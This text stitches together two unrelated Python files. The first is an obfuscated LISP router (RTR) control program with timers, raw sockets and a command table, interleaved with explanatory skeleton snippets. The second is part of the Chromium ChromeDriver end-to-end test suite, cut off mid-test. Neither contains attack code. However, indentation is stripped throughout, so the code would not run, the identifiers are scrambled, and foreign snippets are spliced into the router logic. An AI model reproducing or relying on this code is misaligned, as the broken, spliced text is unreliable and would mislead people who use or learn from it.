iiI111I1iIiI = lisp.green(Ii1iIiII1ii1, False)
Iiii111 = lisp.green(iI1ii11Ii, False)
lisp.lprint("{} RLE {} for gleaned group {}".format(iiI111I1iIiI, ooooO0, Iiii111))
lisp.lisp_remove_gleaned_multicast(o0oOO000oO0oo, i1)
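# A minimal model of the collect-then-delete sweep used above: never remove
# dictionary entries while iterating them. Timeout value is illustrative.
import time

TIMEOUT = 180.0
last_report = {("10.1.1.1", "224.1.1.1"): time.time() - 300}

expired = [key for key, stamp in last_report.items()
           if time.time() - stamp >= TIMEOUT]
for key in expired:
    del last_report[key]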
# Once-a-minute housekeeping: flush stale crypto keys and NAT-trace state,
# time out map-cache entries and gleaned groups, send IGMP queries, then
# re-arm the timer.
def ii1II1II(lisp_raw_socket):
lisp.lisp_set_exception()
for oOo0oO in lisp.lisp_crypto_keys_by_nonce.values():
for O0o in oOo0oO: del O0o
lisp.lisp_crypto_keys_by_nonce.clear()
lisp.lisp_crypto_keys_by_nonce = {}
lisp.lisp_timeout_map_cache(lisp.lisp_map_cache)
lisp.lisp_rtr_nat_trace_cache.clear()
lisp.lisp_rtr_nat_trace_cache = {}
O0O0oo()
IIi1ii1(lisp_raw_socket)
Oooo0000 = threading.Timer(60, ii1II1II, [lisp_raw_socket])
Oooo0000.start()
return
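# The periodic task re-arms itself with a fresh threading.Timer each pass
# rather than looping with sleep, so each run gets its own thread and a
# slow pass cannot stall the schedule indefinitely. Skeleton of the
# pattern, with a hypothetical task body:
import threading

def every_minute():
    # ... do housekeeping here ...
    timer = threading.Timer(60, every_minute)
    timer.start()

every_minute()  # first call runs immediately, then re-arms every 60 s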
# RTR startup: create listen/send sockets, raw sockets for both address
# families, pcap and worker threads, then load checkpoint state and arm the
# periodic housekeeping timer.
def iIIi1Ii1III():
global Oo0oO0oo0oO00, II1iII1i, II1Ii1iI1i
global OOo, Ii1IIii11, I11
global i111I, oO0oIIII
global iIiiI1
lisp.lisp_i_am("rtr")
lisp.lisp_set_exception()
lisp.lisp_print_banner("RTR starting up")
if lisp.lisp_get_local_addresses() == False: return False
# On AWS, source from the eth0 interface address rather than the
# discovered RLOC.
iIiiI1 = lisp.lisp_myrlocs[0]
if lisp.lisp_on_aws():
iIiiI1 = lisp.lisp_get_interface_address("eth0")
# Open the control sockets (Raspbian lacks a usable IPv6 wildcard bind).
i1iI1i = "0.0.0.0" if lisp.lisp_is_raspbian() else "0::0"
II1Ii1iI1i = lisp.lisp_open_listen_socket(i1iI1i, str(iiI1iIiI))
Oo0oO0oo0oO00 = lisp.lisp_open_listen_socket("", "lisp-rtr")
i111I = lisp.lisp_open_listen_socket("", "lispers.net-itr")
II1iII1i[0] = II1Ii1iI1i
II1iII1i[1] = lisp.lisp_open_send_socket("", lisp.LISP_AFI_IPV6)
II1iII1i[2] = Oo0oO0oo0oO00
# Raw IPv4 socket for forwarding packets with self-built headers.
OOo = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
OOo.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
II1iII1i.append(OOo)
oO0oIIII = lisp.lisp_open_listen_socket("0.0.0.0", str(lisp.LISP_TRACE_PORT))
if lisp.lisp_is_raspbian() == False:
Ii1IIii11 = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_UDP)
# Thread counts are tunable through environment variables.
Ii1Ii1 = os.getenv("LISP_PCAP_THREADS")
Ii1Ii1 = 1 if Ii1Ii1 is None else int(Ii1Ii1)
ii1IiI11I = os.getenv("LISP_WORKER_THREADS")
ii1IiI11I = 0 if ii1IiI11I is None else int(ii1IiI11I)
for i11ii in range(Ii1Ii1):
oOOOOO0Ooooo = lisp.lisp_thread("pcap-{}".format(i11ii))
oOOOOO0Ooooo.thread_number = i11ii
oOOOOO0Ooooo.number_of_pcap_threads = Ii1Ii1
oOOOOO0Ooooo.number_of_worker_threads = ii1IiI11I
I11.append(oOOOOO0Ooooo)
threading.Thread(target=i1i1IiIi1, args=[oOOOOO0Ooooo]).start()
for i11ii in range(ii1IiI11I):
oOOOOO0Ooooo = lisp.lisp_thread("worker-{}".format(i11ii))
I11.append(oOOOOO0Ooooo)
threading.Thread(target=I1I1iII1i, args=[oOOOOO0Ooooo]).start()
lisp.lisp_load_checkpoint()
lisp.lisp_load_split_pings = (os.getenv("LISP_LOAD_SPLIT_PINGS") is not None)
Oooo0000 = threading.Timer(60, ii1II1II, [OOo])
Oooo0000.start()
return True
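# Minimal sketch of the raw-socket setup used for forwarding (Linux,
# requires root): IPPROTO_RAW sockets send with the caller supplying the
# full IP header, and the explicit IP_HDRINCL makes that intent clear.
import socket

raw = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
raw.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
# raw.sendto(full_ip_packet, (dest_ip, 0))  # header built by the caller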
# Orderly shutdown: close every socket opened at startup.
def OoIi1I1I():
lisp.lisp_close_socket(II1iII1i[0], "")
lisp.lisp_close_socket(II1iII1i[1], "")
lisp.lisp_close_socket(Oo0oO0oo0oO00, "lisp-rtr")
lisp.lisp_close_socket(II1Ii1iI1i, "")
lisp.lisp_close_socket(oO0oIIII, "")
lisp.lisp_close_socket(i111I, "lispers.net-itr")
OOo.close()
return
# "lisp map-resolver" command handler: record the resolver, then schedule a
# one-shot reachability test if none is already running.
def ooOOO00oOOooO(kv_pair):
global II1iII1i
global iiI1iIiI
lispconfig.lisp_map_resolver_command(kv_pair)
if (lisp.lisp_test_mr_timer is None or lisp.lisp_test_mr_timer.is_alive() == False):
lisp.lisp_test_mr_timer = threading.Timer(2, lisp.lisp_test_mr, [II1iII1i, iiI1iIiI])
lisp.lisp_test_mr_timer.start()
return
# "lisp xtr-parameters" command handler: apply the config, start RLOC
# probing if it was just enabled, and push parameters to the data-plane.
def O00Ooo(kv_pair):
global II1Ii1iI1i, OOo, iiI1iIiI
oo00ooooOOo00 = lisp.lisp_rloc_probing
lispconfig.lisp_xtr_command(kv_pair)
if oo00ooooOOo00 == False and lisp.lisp_rloc_probing:
i1I = [II1Ii1iI1i, II1Ii1iI1i, None, OOo]
lisp.lisp_start_rloc_probe_timer(1, i1I)
oO0Oo = {"type": "itr-crypto-port", "port": iiI1iIiI}
lisp.lisp_write_to_dp_socket(oO0Oo)
lisp.lisp_ipc_write_xtr_parameters(lisp.lisp_debug_logging, lisp.lisp_data_plane_logging)
return
# Command dispatch table: maps CLI commands to handler functions and the
# accepted parameters with their types and value ranges.
iI1111i = {
"lisp xtr-parameters" : [ O00Ooo , {
"rloc-probing" : [ True , "yes" , "no" ] ,
"nonce-echoing" : [ True , "yes" , "no" ] ,
"data-plane-security" : [ True , "yes" , "no" ] ,
"data-plane-logging" : [ True , "yes" , "no" ] ,
"frame-logging" : [ True , "yes" , "no" ] ,
"flow-logging" : [ True , "yes" , "no" ] ,
"nat-traversal" : [ True , "yes" , "no" ] ,
"checkpoint-map-cache" : [ True , "yes" , "no" ] ,
"ipc-data-plane" : [ True , "yes" , "no" ] ,
"decentralized-push-xtr" : [ True , "yes" , "no" ] ,
"decentralized-pull-xtr-modulus" : [ True , 1 , 0xff ] ,
"decentralized-pull-xtr-dns-suffix" : [ True ] ,
"register-reachable-rtrs" : [ True , "yes" , "no" ] ,
"program-hardware" : [ True , "yes" , "no" ] } ] ,
"lisp interface" : [ lispconfig . lisp_interface_command , {
"interface-name" : [ True ] ,
"device" : [ True ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"dynamic-eid" : [ True ] ,
"dynamic-eid-device" : [ True ] ,
"lisp-nat" : [ True , "yes" , "no" ] ,
"dynamic-eid-timeout" : [ True , 0 , 0xff ] } ] ,
"lisp map-resolver" : [ ooOOO00oOOooO , {
"mr-name" : [ True ] ,
"ms-name" : [ True ] ,
"dns-name" : [ True ] ,
"address" : [ True ] } ] ,
"lisp map-cache" : [ lispconfig . lisp_map_cache_command , {
"prefix" : [ ] ,
"mr-name" : [ True ] ,
"ms-name" : [ True ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"send-map-request" : [ True , "yes" , "no" ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"rle-name" : [ True ] ,
"elp-name" : [ True ] ,
"address" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"lisp rtr-map-cache" : [ lispconfig . lisp_map_cache_command , {
"prefix" : [ ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"rle-name" : [ True ] ,
"elp-name" : [ True ] ,
"address" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"lisp explicit-locator-path" : [ lispconfig . lisp_elp_command , {
"elp-name" : [ False ] ,
"elp-node" : [ ] ,
"address" : [ True ] ,
"probe" : [ True , "yes" , "no" ] ,
"strict" : [ True , "yes" , "no" ] ,
"eid" : [ True , "yes" , "no" ] } ] ,
"lisp replication-list-entry" : [ lispconfig . lisp_rle_command , {
"rle-name" : [ False ] ,
"rle-node" : [ ] ,
"address" : [ True ] ,
"level" : [ True , 0 , 255 ] } ] ,
"lisp json" : [ lispconfig . lisp_json_command , {
"json-name" : [ False ] ,
"json-string" : [ False ] } ] ,
"lisp database-mapping" : [ i11 , {
"prefix" : [ ] ,
"mr-name" : [ True ] ,
"ms-name" : [ True ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"secondary-instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"dynamic-eid" : [ True , "yes" , "no" ] ,
"signature-eid" : [ True , "yes" , "no" ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"elp-name" : [ True ] ,
"geo-name" : [ True ] ,
"rle-name" : [ True ] ,
"json-name" : [ True ] ,
"address" : [ True ] ,
"interface" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"lisp glean-mapping" : [ O0O0O , {
"instance-id" : [ False ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"rloc-prefix" : [ True ] ,
"rloc-probe" : [ True , "yes" , "no" ] ,
"igmp-query" : [ True , "yes" , "no" ] } ] ,
"show rtr-rloc-probing" : [ iiI1I11i1i , { } ] ,
"show rtr-keys" : [ o00oOO0 , { } ] ,
"show rtr-map-cache" : [ O00oooo0O , { } ] ,
"show rtr-map-cache-dns" : [ Ii1IOo0o0 , { } ]
}
# Receive a LISP-Trace packet on the trace port and cache the translated
# source address/port so NATed trace replies can be returned.
def Oo0O0OO0OoO0(lisp_socket):
O0oO0oo0O, OOOo, OoOO, Ooooo00o0OoO = lisp.lisp_receive(lisp_socket, False)
oo = lisp.lisp_trace()
if oo.decode(Ooooo00o0OoO) == False: return
oo.rtr_cache_nat_trace(OOOo, OoOO)
# Main: start the RTR, then service the control sockets until told to exit.
if iIIi1Ii1III() == False:
lisp.lprint("lisp_rtr_startup() failed")
lisp.lisp_print_banner("RTR abnormal exit")
exit(1)
oooOoO00OooO0 = [II1Ii1iI1i, Oo0oO0oo0oO00, i111I, oO0oIIII]
o00OOo = [II1Ii1iI1i] * 3
while True:
try: I1Ii1i11I1I, oo0o000o0oOO0, i1I11IiI1iiII = select.select(oooOoO00OooO0, [], [])
except: break
# Punt socket: data-plane packets the external data-plane could not handle.
if lisp.lisp_ipc_data_plane and i111I in I1Ii1i11I1I:
lisp.lisp_process_punt(i111I, II1iII1i, iiI1iIiI)
# LISP-Trace packets.
if oO0oIIII in I1Ii1i11I1I:
Oo0O0OO0OoO0(oO0oIIII)
# Control packets on the LISP port; RLOC-probes arrive via pcap instead.
if II1Ii1iI1i in I1Ii1i11I1I:
O0oO0oo0O, OOOo, OoOO, Ooooo00o0OoO = lisp.lisp_receive(o00OOo[0], False)
if OOOo == "": break
if lisp.lisp_is_rloc_probe_request(Ooooo00o0OoO[0]):
lisp.lprint("RTR ignoring RLOC-probe request, using pcap")
continue
if lisp.lisp_is_rloc_probe_reply(Ooooo00o0OoO[0]):
lisp.lprint("RTR ignoring RLOC-probe reply, using pcap")
continue
lisp.lisp_parse_packet(o00OOo, Ooooo00o0OoO, OOOo, OoOO)
# IPC socket: commands, API calls, and punted data packets.
if Oo0oO0oo0oO00 in I1Ii1i11I1I:
O0oO0oo0O, OOOo, OoOO, Ooooo00o0OoO = lisp.lisp_receive(Oo0oO0oo0oO00, True)
if OOOo == "": break
if O0oO0oo0O == "command":
if Ooooo00o0OoO == "clear":
lisp.lisp_clear_map_cache()
continue
if Ooooo00o0OoO.find("clear%") != -1:
lispconfig.lisp_clear_decap_stats(Ooooo00o0OoO)
continue
lispconfig.lisp_process_command(Oo0oO0oo0oO00, O0oO0oo0O, Ooooo00o0OoO, "lisp-rtr", [iI1111i])
elif O0oO0oo0O == "api":
lisp.lisp_process_api("lisp-rtr", Oo0oO0oo0oO00, Ooooo00o0OoO)
elif O0oO0oo0O == "data-packet":
IIIii(Ooooo00o0OoO, "")
else:
if lisp.lisp_is_rloc_probe_request(Ooooo00o0OoO[0]):
lisp.lprint("RTR ignoring RLOC-probe request, using pcap")
continue
if lisp.lisp_is_rloc_probe_reply(Ooooo00o0OoO[0]):
lisp.lprint("RTR ignoring RLOC-probe reply, using pcap")
continue
lisp.lisp_parse_packet(II1iII1i, Ooooo00o0OoO, OOOo, OoOO)
OoIi1I1I()
lisp.lisp_print_banner("RTR normal exit")
exit(0)
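# The event loop above is a classic select() dispatcher. Stripped to its
# skeleton (socket and handler names are placeholders):
import select

def serve(sockets, handlers):
    while True:
        try:
            readable, _, _ = select.select(sockets, [], [])
        except Exception:
            break  # interrupted: fall through to cleanup
        for sock in readable:
            handlers[sock](sock)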
# dd678faae9ac167bc83abf78e5cb2f3f0688d3a3
|
run_py_tests.py | #!/usr/bin/env python
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""End to end tests for ChromeDriver."""
import base64
import json
import math
import optparse
import os
import socket
import subprocess
import sys
import tempfile
import threading
import time
import unittest
import urllib2
import shutil
_THIS_DIR = os.path.abspath(os.path.dirname(__file__))
sys.path.insert(1, os.path.join(_THIS_DIR, os.pardir))
sys.path.insert(1, os.path.join(_THIS_DIR, os.pardir, 'client'))
sys.path.insert(1, os.path.join(_THIS_DIR, os.pardir, 'server'))
import chrome_paths
import chromedriver
import unittest_util
import util
import server
from webelement import WebElement
import webserver
_TEST_DATA_DIR = os.path.join(chrome_paths.GetTestData(), 'chromedriver')
if util.IsLinux():
sys.path.insert(0, os.path.join(chrome_paths.GetSrc(), 'build', 'android'))
from pylib import android_commands
from pylib import constants
from pylib import forwarder
from pylib import valgrind_tools
from pylib.device import device_utils
_NEGATIVE_FILTER = [
# https://code.google.com/p/chromedriver/issues/detail?id=213
'ChromeDriverTest.testClickElementInSubFrame',
# This test is flaky since it uses setTimeout.
# Re-enable once crbug.com/177511 is fixed and we can remove setTimeout.
'ChromeDriverTest.testAlert',
]
_VERSION_SPECIFIC_FILTER = {}
_VERSION_SPECIFIC_FILTER['HEAD'] = [
# https://code.google.com/p/chromedriver/issues/detail?id=913
'ChromeDriverTest.testChromeDriverReceiveAndSendLargeData',
]
_VERSION_SPECIFIC_FILTER['37'] = [
# https://code.google.com/p/chromedriver/issues/detail?id=954
'MobileEmulationCapabilityTest.testClickElement',
'MobileEmulationCapabilityTest.testHoverOverElement',
'MobileEmulationCapabilityTest.testSingleTapElement',
]
_VERSION_SPECIFIC_FILTER['36'] = [
# https://code.google.com/p/chromedriver/issues/detail?id=954
'MobileEmulationCapabilityTest.testClickElement',
'MobileEmulationCapabilityTest.testHoverOverElement',
'MobileEmulationCapabilityTest.testSingleTapElement',
]
_OS_SPECIFIC_FILTER = {}
_OS_SPECIFIC_FILTER['win'] = [
# https://code.google.com/p/chromedriver/issues/detail?id=214
'ChromeDriverTest.testCloseWindow',
# https://code.google.com/p/chromedriver/issues/detail?id=299
'ChromeLogPathCapabilityTest.testChromeLogPath',
]
_OS_SPECIFIC_FILTER['linux'] = [
# Xvfb doesn't support maximization.
'ChromeDriverTest.testWindowMaximize',
# https://code.google.com/p/chromedriver/issues/detail?id=302
'ChromeDriverTest.testWindowPosition',
'ChromeDriverTest.testWindowSize',
]
_OS_SPECIFIC_FILTER['mac'] = [
# https://code.google.com/p/chromedriver/issues/detail?id=304
'ChromeDriverTest.testGoBackAndGoForward',
]
_DESKTOP_NEGATIVE_FILTER = [
# Desktop doesn't support touch (without --touch-events).
'ChromeDriverTest.testSingleTapElement',
'ChromeDriverTest.testTouchDownUpElement',
'ChromeDriverTest.testTouchFlickElement',
'ChromeDriverTest.testTouchMovedElement',
'ChromeDriverAndroidTest.*',
]
def _GetDesktopNegativeFilter(version_name):
# Avoid shadowing the builtin filter() and the imported os module.
negative_filter = _NEGATIVE_FILTER + _DESKTOP_NEGATIVE_FILTER
os_name = util.GetPlatformName()
if os_name in _OS_SPECIFIC_FILTER:
negative_filter += _OS_SPECIFIC_FILTER[os_name]
if version_name in _VERSION_SPECIFIC_FILTER:
negative_filter += _VERSION_SPECIFIC_FILTER[version_name]
return negative_filter
_ANDROID_NEGATIVE_FILTER = {}
_ANDROID_NEGATIVE_FILTER['chrome'] = (
_NEGATIVE_FILTER + [
# TODO(chrisgao): fix hang of tab crash test on android.
'ChromeDriverTest.testTabCrash',
# Android doesn't support switches and extensions.
'ChromeSwitchesCapabilityTest.*',
'ChromeExtensionsCapabilityTest.*',
'MobileEmulationCapabilityTest.*',
'ChromeDownloadDirTest.*',
# https://crbug.com/274650
'ChromeDriverTest.testCloseWindow',
# https://code.google.com/p/chromedriver/issues/detail?id=270
'ChromeDriverTest.testPopups',
# https://code.google.com/p/chromedriver/issues/detail?id=298
'ChromeDriverTest.testWindowPosition',
'ChromeDriverTest.testWindowSize',
'ChromeDriverTest.testWindowMaximize',
'ChromeLogPathCapabilityTest.testChromeLogPath',
'RemoteBrowserTest.*',
# Don't enable perf testing on Android yet.
'PerfTest.testSessionStartTime',
'PerfTest.testSessionStopTime',
'PerfTest.testColdExecuteScript',
# https://code.google.com/p/chromedriver/issues/detail?id=459
'ChromeDriverTest.testShouldHandleNewWindowLoadingProperly',
# https://code.google.com/p/chromedriver/issues/detail?id=913
'ChromeDriverTest.testChromeDriverReceiveAndSendLargeData',
]
)
_ANDROID_NEGATIVE_FILTER['chrome_stable'] = (
_ANDROID_NEGATIVE_FILTER['chrome'])
_ANDROID_NEGATIVE_FILTER['chrome_beta'] = (
_ANDROID_NEGATIVE_FILTER['chrome'])
_ANDROID_NEGATIVE_FILTER['chrome_shell'] = (
_ANDROID_NEGATIVE_FILTER['chrome'] + [
# ChromeShell doesn't support multiple tabs.
'ChromeDriverTest.testGetWindowHandles',
'ChromeDriverTest.testSwitchToWindow',
'ChromeDriverTest.testShouldHandleNewWindowLoadingProperly',
]
)
_ANDROID_NEGATIVE_FILTER['chromedriver_webview_shell'] = (
_ANDROID_NEGATIVE_FILTER['chrome_shell'] + [
# https://code.google.com/p/chromedriver/issues/detail?id=913
'ChromeDriverTest.testChromeDriverSendLargeData',
'PerformanceLoggerTest.testPerformanceLogger',
]
)
class ChromeDriverBaseTest(unittest.TestCase):
"""Base class for testing chromedriver functionalities."""
def __init__(self, *args, **kwargs):
super(ChromeDriverBaseTest, self).__init__(*args, **kwargs)
self._drivers = []
def tearDown(self):
for driver in self._drivers:
try:
driver.Quit()
except:
pass
def CreateDriver(self, server_url=None, download_dir=None, **kwargs):
if server_url is None:
server_url = _CHROMEDRIVER_SERVER_URL
android_package = None
android_activity = None
android_process = None
if _ANDROID_PACKAGE_KEY:
android_package = constants.PACKAGE_INFO[_ANDROID_PACKAGE_KEY].package
if _ANDROID_PACKAGE_KEY == 'chromedriver_webview_shell':
android_activity = constants.PACKAGE_INFO[_ANDROID_PACKAGE_KEY].activity
android_process = '%s:main' % android_package
driver = chromedriver.ChromeDriver(server_url,
chrome_binary=_CHROME_BINARY,
android_package=android_package,
android_activity=android_activity,
android_process=android_process,
download_dir=download_dir,
**kwargs)
self._drivers += [driver]
return driver
class ChromeDriverTest(ChromeDriverBaseTest):
"""End to end tests for ChromeDriver."""
@staticmethod
def GlobalSetUp():
ChromeDriverTest._http_server = webserver.WebServer(
chrome_paths.GetTestData())
ChromeDriverTest._sync_server = webserver.SyncWebServer()
if _ANDROID_PACKAGE_KEY:
ChromeDriverTest._device = device_utils.DeviceUtils(
android_commands.GetAttachedDevices()[0])
http_host_port = ChromeDriverTest._http_server._server.server_port
sync_host_port = ChromeDriverTest._sync_server._server.server_port
forwarder.Forwarder.Map(
[(http_host_port, http_host_port), (sync_host_port, sync_host_port)],
ChromeDriverTest._device)
@staticmethod
def GlobalTearDown():
if _ANDROID_PACKAGE_KEY:
forwarder.Forwarder.UnmapAllDevicePorts(ChromeDriverTest._device)
ChromeDriverTest._http_server.Shutdown()
@staticmethod
def GetHttpUrlForFile(file_path):
return ChromeDriverTest._http_server.GetUrl() + file_path
def setUp(self):
self._driver = self.CreateDriver()
def testStartStop(self):
pass
def testLoadUrl(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
def testGetCurrentWindowHandle(self):
self._driver.GetCurrentWindowHandle()
def _WaitForNewWindow(self, old_handles):
"""Wait for at least one new window to show up in 20 seconds.
Args:
old_handles: Handles to all old windows before the new window is added.
Returns:
Handle to a new window. None if timeout.
"""
deadline = time.time() + 20
while time.time() < deadline:
new_handles = self._driver.GetWindowHandles()
if len(new_handles) > len(old_handles):
for index, old_handle in enumerate(old_handles):
self.assertEquals(old_handle, new_handles[index])
return new_handles[len(old_handles)]
time.sleep(0.01)
return None
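# _WaitForNewWindow above is the standard poll-until-deadline idiom; the
# same shape works for any eventually-true condition. Hypothetical helper,
# not part of the test suite:
import time

def wait_until(predicate, timeout=20, interval=0.01):
    deadline = time.time() + timeout
    while time.time() < deadline:
        result = predicate()
        if result:
            return result
        time.sleep(interval)
    return None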
def testCloseWindow(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html'))
old_handles = self._driver.GetWindowHandles()
self._driver.FindElement('id', 'link').Click()
new_window_handle = self._WaitForNewWindow(old_handles)
self.assertNotEqual(None, new_window_handle)
self._driver.SwitchToWindow(new_window_handle)
self.assertEquals(new_window_handle, self._driver.GetCurrentWindowHandle())
self.assertRaises(chromedriver.NoSuchElement,
self._driver.FindElement, 'id', 'link')
self._driver.CloseWindow()
self.assertRaises(chromedriver.NoSuchWindow,
self._driver.GetCurrentWindowHandle)
new_handles = self._driver.GetWindowHandles()
for old_handle in old_handles:
self.assertTrue(old_handle in new_handles)
for handle in new_handles:
self._driver.SwitchToWindow(handle)
self.assertEquals(handle, self._driver.GetCurrentWindowHandle())
self._driver.CloseWindow()
def testGetWindowHandles(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html'))
old_handles = self._driver.GetWindowHandles()
self._driver.FindElement('id', 'link').Click()
self.assertNotEqual(None, self._WaitForNewWindow(old_handles))
def testSwitchToWindow(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html'))
self.assertEquals(
1, self._driver.ExecuteScript('window.name = "oldWindow"; return 1;'))
window1_handle = self._driver.GetCurrentWindowHandle()
old_handles = self._driver.GetWindowHandles()
self._driver.FindElement('id', 'link').Click()
new_window_handle = self._WaitForNewWindow(old_handles)
self.assertNotEqual(None, new_window_handle)
self._driver.SwitchToWindow(new_window_handle)
self.assertEquals(new_window_handle, self._driver.GetCurrentWindowHandle())
self.assertRaises(chromedriver.NoSuchElement,
self._driver.FindElement, 'id', 'link')
self._driver.SwitchToWindow('oldWindow')
self.assertEquals(window1_handle, self._driver.GetCurrentWindowHandle())
def testEvaluateScript(self):
self.assertEquals(1, self._driver.ExecuteScript('return 1'))
self.assertEquals(None, self._driver.ExecuteScript(''))
def testEvaluateScriptWithArgs(self):
script = ('document.body.innerHTML = "<div>b</div><div>c</div>";'
'return {stuff: document.querySelectorAll("div")};')
stuff = self._driver.ExecuteScript(script)['stuff']
script = 'return arguments[0].innerHTML + arguments[1].innerHTML'
self.assertEquals(
'bc', self._driver.ExecuteScript(script, stuff[0], stuff[1]))
def testEvaluateInvalidScript(self):
self.assertRaises(chromedriver.ChromeDriverException,
self._driver.ExecuteScript, '{{{')
def testExecuteAsyncScript(self):
self._driver.SetTimeout('script', 3000)
self.assertRaises(
chromedriver.ScriptTimeout,
self._driver.ExecuteAsyncScript,
'var callback = arguments[0];'
'setTimeout(function(){callback(1);}, 10000);')
self.assertEquals(
2,
self._driver.ExecuteAsyncScript(
'var callback = arguments[0];'
'setTimeout(function(){callback(2);}, 300);'))
def testSwitchToFrame(self):
self._driver.ExecuteScript(
'var frame = document.createElement("iframe");'
'frame.id="id";'
'frame.name="name";'
'document.body.appendChild(frame);')
self.assertTrue(self._driver.ExecuteScript('return window.top == window'))
self._driver.SwitchToFrame('id')
self.assertTrue(self._driver.ExecuteScript('return window.top != window'))
self._driver.SwitchToMainFrame()
self.assertTrue(self._driver.ExecuteScript('return window.top == window'))
self._driver.SwitchToFrame('name')
self.assertTrue(self._driver.ExecuteScript('return window.top != window'))
self._driver.SwitchToMainFrame()
self.assertTrue(self._driver.ExecuteScript('return window.top == window'))
self._driver.SwitchToFrameByIndex(0)
self.assertTrue(self._driver.ExecuteScript('return window.top != window'))
self._driver.SwitchToMainFrame()
self.assertTrue(self._driver.ExecuteScript('return window.top == window'))
self._driver.SwitchToFrame(self._driver.FindElement('tag name', 'iframe'))
self.assertTrue(self._driver.ExecuteScript('return window.top != window'))
def testSwitchToParentFrame(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/nested.html'))
self.assertTrue('One' in self._driver.GetPageSource())
self._driver.SwitchToFrameByIndex(0)
self.assertTrue('Two' in self._driver.GetPageSource())
self._driver.SwitchToFrameByIndex(0)
self.assertTrue('Three' in self._driver.GetPageSource())
self._driver.SwitchToParentFrame()
self.assertTrue('Two' in self._driver.GetPageSource())
self._driver.SwitchToParentFrame()
self.assertTrue('One' in self._driver.GetPageSource())
def testExecuteInRemovedFrame(self):
self._driver.ExecuteScript(
'var frame = document.createElement("iframe");'
'frame.id="id";'
'frame.name="name";'
'document.body.appendChild(frame);'
'window.addEventListener("message",'
' function(event) { document.body.removeChild(frame); });')
self.assertTrue(self._driver.ExecuteScript('return window.top == window'))
self._driver.SwitchToFrame('id')
self.assertTrue(self._driver.ExecuteScript('return window.top != window'))
self._driver.ExecuteScript('parent.postMessage("remove", "*");')
self.assertTrue(self._driver.ExecuteScript('return window.top == window'))
def testGetTitle(self):
script = 'document.title = "title"; return 1;'
self.assertEquals(1, self._driver.ExecuteScript(script))
self.assertEquals('title', self._driver.GetTitle())
def testGetPageSource(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html'))
self.assertTrue('Link to empty.html' in self._driver.GetPageSource())
def testFindElement(self):
self._driver.ExecuteScript(
'document.body.innerHTML = "<div>a</div><div>b</div>";')
self.assertTrue(
isinstance(self._driver.FindElement('tag name', 'div'), WebElement))
def testFindElements(self):
self._driver.ExecuteScript(
'document.body.innerHTML = "<div>a</div><div>b</div>";')
divs = self._driver.FindElements('tag name', 'div')
self.assertTrue(isinstance(divs, list))
self.assertEquals(2, len(divs))
for div in divs:
self.assertTrue(isinstance(div, WebElement))
def testFindChildElement(self):
self._driver.ExecuteScript(
'document.body.innerHTML = "<div><br><br></div><div><a></a></div>";')
element = self._driver.FindElement('tag name', 'div')
self.assertTrue(
isinstance(element.FindElement('tag name', 'br'), WebElement))
def testFindChildElements(self):
self._driver.ExecuteScript(
'document.body.innerHTML = "<div><br><br></div><div><br></div>";')
element = self._driver.FindElement('tag name', 'div')
brs = element.FindElements('tag name', 'br')
self.assertTrue(isinstance(brs, list))
self.assertEquals(2, len(brs))
for br in brs:
self.assertTrue(isinstance(br, WebElement))
def testHoverOverElement(self):
div = self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.addEventListener("mouseover", function() {'
' document.body.appendChild(document.createElement("br"));'
'});'
'return div;')
div.HoverOver()
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testClickElement(self):
div = self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.addEventListener("click", function() {'
' div.innerHTML="new<br>";'
'});'
'return div;')
div.Click()
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testSingleTapElement(self):
div = self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.addEventListener("touchend", function() {'
' div.innerHTML="new<br>";'
'});'
'return div;')
div.SingleTap()
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testTouchDownUpElement(self):
div = self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.addEventListener("touchend", function() {'
' div.innerHTML="new<br>";'
'});'
'return div;')
loc = div.GetLocation()
self._driver.TouchDown(loc['x'], loc['y'])
self._driver.TouchUp(loc['x'], loc['y'])
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testTouchFlickElement(self):
dx = 3
dy = 4
speed = 5
flickTouchEventsPerSecond = 30
moveEvents = int(
math.sqrt(dx * dx + dy * dy) * flickTouchEventsPerSecond / speed)
